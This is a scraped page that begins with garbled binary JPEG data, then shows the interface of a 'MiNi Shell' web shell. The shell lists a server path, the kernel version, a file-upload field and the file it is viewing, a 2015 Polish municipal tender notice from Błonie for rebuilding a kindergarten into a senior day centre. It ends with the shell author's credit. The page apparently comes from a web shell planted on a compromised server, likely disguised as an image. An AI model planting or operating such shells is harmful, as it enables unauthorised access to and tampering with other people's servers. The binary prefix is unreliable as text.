JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150827/127505-N-2015.html

<p class="kh_header"><b>Błonie: Rozbudowa i nadbudowa  budynku przedszkola wraz ze zmianą sposobu użytkowania na  dzienny dom SENIOR-WIGOR w Błoniu przy ul.  3-go Maja 10.</b><br>
<b>Numer ogłoszenia: 127505 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i nadbudowa  budynku przedszkola wraz ze zmianą sposobu użytkowania na  dzienny dom SENIOR-WIGOR w Błoniu przy ul.  3-go Maja 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia obejmuje min.: 
1.1. roboty rozbiórkowe:
     - rozbiórka części ścianek działowych murowanych,
     - demontaż istniejących warstw podłogowych,
     - demontaż instalacji podlegających zmianom lub wymianie, 
     - skucie istniejących okładzin z terakoty, 
1.2. roboty ogólnobudowlane i instalacyjne:     
     - zamurowanie zbędnych otworów,
     - wykonanie nowych otworów w ścianach istniejących,
     - wykonanie nowych warstw posadzkowych,   
     - wykonanie projektowanych instalacji c.o., wod-kan,
     - wykonanie instalacji elektrycznej,
     - wykonanie instalacji wentylacji grawitacyjnej,
     - wykonanie nowych ścianek działowych,
     - zabezpieczenie istniejącej konstrukcji drewnianej preparatem p.poż oraz przeciw korozji 
       biologicznej i owadom,
     - docieplenie elewacji i istniejącego stropu nad główną bryłą budynku,
1.3. roboty związane z rozbudową:
     - wykonanie ław i stop fundamentowych,
     - wykonanie izolacji,
     - wymurowanie ścian,
     - wykonanie dachu jednospadowego,
     - wykonanie tarasu oraz pochylni,
1.4. roboty wykończeniowe:     
     - wykonanie obudowy instalacji w technologii g-k,
     - wykonanie tynków wewnętrznych, okładzin, posadzek,
     - montaż stolarki okiennej i drzwiowej,
     - wyrównanie istniejących tynków gipsem,
     - wykonanie okładzin ściennych z glazury,
     - malowanie ścian i sufitów,

Szczegółowy opis przedmiotu zamówienia i zakres robót do wykonania zawarty jest 
w dokumentach:
- projekcie budowlanym,
- specyfikacji technicznej  wykonania i odbioru robót budowlanych,
- przedmiarach robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego polegającego na powtórzeniu prac będących przedmiotem zamówienia lub jego części, o którym jest mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium:
       1. Wysokość wadium.
    1.1. Każda składana oferta musi być zabezpieczona wadium w wysokości 15.000 PLN     
           (słownie:  piętnaście tysięcy złotych).   
    2. Forma wadium.
    2.1. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a). pieniądzu,
     b). poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo -  
           kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c). gwarancjach bankowych,
     d). gwarancjach ubezpieczeniowych,
     e). poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
          ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju      
          Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158,  z późn. zm.)
    3. Miejsce i sposób wniesienia wadium.
    3.1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  
           Zamawiającego:  Bank PKO BP S.A.  VO/Warszawa
                                        nr rachunku: 95 1020 1055  0000 9302 0024 2743

    3.2. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z 
           oryginałem lub dostarczyć ją Zamawiającemu przed otwarciem ofert.

    3.3. Wadium wnoszone w formie pieniężnej uznaje się za wniesione, jeżeli znajdzie się na   
           koncie Zamawiającego przed upływem terminu składania ofert.
           Termin wniesienia wadium potwierdza bank prowadzący bankową obsługę Gminy.
    3.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
    3.5. W przypadku składania wadium w jednej z form wymienionych w pkt 2.1 niniejszego 
           rozdziału, dokument winien zawierać jednoznacznie sformułowane: nazwę  i adres 
           Zamawiającego, przedmiot zamówienia i nr sprawy, termin obowiązywania dokumentu,     
           wysokość wadium oraz warunki zwrotu i zatrzymania przez Zamawiającego wadium 
           wraz z odsetkami, zgodnie z art. 46 ustawy z dnia 29 stycznia 2004 r. Pzp.
     4. Oryginał wadium (w przypadku przelewu - potwierdzenie dokonania przelewu na konto 
         Zamawiającego) należy złożyć w Wydziale Zamówień Publicznych w Urzędzie Miejskim
         w Błoniu (Ratusz), ul. Rynek 6, pokój nr 3 (parter) - przed upływem terminu składania         
         ofert lub załączyć do oferty.
     5. Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania na podstawie 
         art. 24 ust. 2 pkt 2, a złożoną przez niego ofertę uznaje się za odrzuconą.
     6. Zwrot wadium.
     6.1. Zamawiający zwraca wadium zgodnie z zapisem art. 46 ust. 1- 4 ustawy Prawo   
           zamówień publicznych.
    7. Utrata wadium.
    7.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
          na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo zamówień publicznych
          nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że 
          wynika to z przyczyn nieleżących po jego stronie.
   7.2. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadkach określonych w 
          art.46 ust.5 ustawy jeżeli Wykonawca, którego oferta została wybrana:
     a). odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
          określonych w ofercie,
     b). nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
     c). zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   
          leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat 
      przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
      okresie, wykonał -  co najmniej 2 roboty o podobnym charakterze co przedmiot zamówienia, tj.   polegające na wykonaniu remontu kapitalnego budynku,
      z załączeniem dowodów (referencji) potwierdzających, czy zostały wykonane w sposób 
      należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i 
      prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna za spełniony warunek dysponowania osobami zdolnymi do wykonania 
      zamówienia, jeżeli Wykonawca dysponować będzie min.10 pracownikami posiadającymi 
      min.5 letnie doświadczenie zawodowe niezbędne do realizacji zamówienia oraz  
      - kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami w 
      specjalności konstrukcyjno-budowlanej oraz aktualne zaświadczenie o przynależności do Izby 
      Inżynierów Budownictwa, 
      - kierownikami robót w branżach: sanitarnej, elektrycznej posiadającymi uprawnienia w    
      danej specjalności oraz aktualną przynależność do Izby Inżynierów Budownictwa,
      Wykonawca złoży oświadczenie, że wykazani kierownicy robót, posiadają wymagane 
       uprawnienia i aktualny wpis na listę członków właściwej Izby Inżynierów Budownictwa;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się inne dokumenty wymagane przez Zamawiającego:
1.1. druk oferty wypełniony i podpisany przez osoby uprawnione (załącznik nr 1 do SIWZ),
1.2. uproszczony kosztorys ofertowy,
1.3. oświadczenie o spełnianiu warunków określonych przepisami art. 22 ust.1 ustawy Pzp 
      (załącznik nr 2 do SIWZ),,
1.4. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp (załącznik 
      nr 4 do SIWZ), 
1.5. oświadczenie dotyczące podmiotów należących do tej samej grupy kapitałowej tj. lista    
       podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 
       16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacje o tym, że  
       nie należy do grupy kapitałowej (załącznik nr 5 do SIWZ), 
1.6. podpisany wzór umowy (załącznik nr 8 do SIWZ) .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, 
        na podstawie której dokonano wyboru Wykonawcy, zgodnie z art. 144 ust.1 ustawy Pzp, 
        chyba że wystąpiły okoliczności:





 1.1. zmiana zakresu robót:
    a)  wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności     
         leżących po stronie Wykonawcy.
   b)  rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. W takim 
         przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym 
         Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, 
         które poniósł Wykonawca w związku z wynikającymi z umowy planowanymi 
         świadczeniami.           
 1.2. zmiana terminu realizacji: 
    a)  zmiana terminu realizacji umowy jeżeli uzasadnione to będzie okolicznościami leżącymi 
         po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi 
         lub warunkami organizacyjnymi,
    b)  z powodu niekorzystnej aury wydłużającej termin budowy, 
  1.3. w innych przypadkach:
     a)  których nie można było przewidzieć w chwili zawarcia umowy, a które nie mają wpływu 
          na wybór Wykonawcy w przeprowadzonym przetargu,
     b)  nastąpi ustawowa zmiana obowiązującej stawki podatku VAT, w takim przypadku 
          wysokość wynagrodzenia należnego Wykonawcy ustalona będzie każdorazowo na dzień
          wystawienia faktury (powstania obowiązku podatkowego).
    2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić 
        zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno 
        przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu ul. Rynek 6, 05-870 Błonie, pok. nr 3 Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2015 godzina 12:00, miejsce: Urząd Miejski w Błoniu ul. Rynek 6, 05-870 Błonie, pok. nr 1 Biuro Obsługi Inerestanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do kontaktu z Wykonawcami: 
 Iwona Kopczyńska   (procedury przetargowe)  -  Urząd Miejski w Błoniu, ul. Rynek 6
 Wydział Zamówień Publicznych,  pok. nr 3 ,tel. 22 725-30-04  w.180,

Zadanie dofinansowane w ramach Programu Wieloletniego Senior-Wigor na lata 2015-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com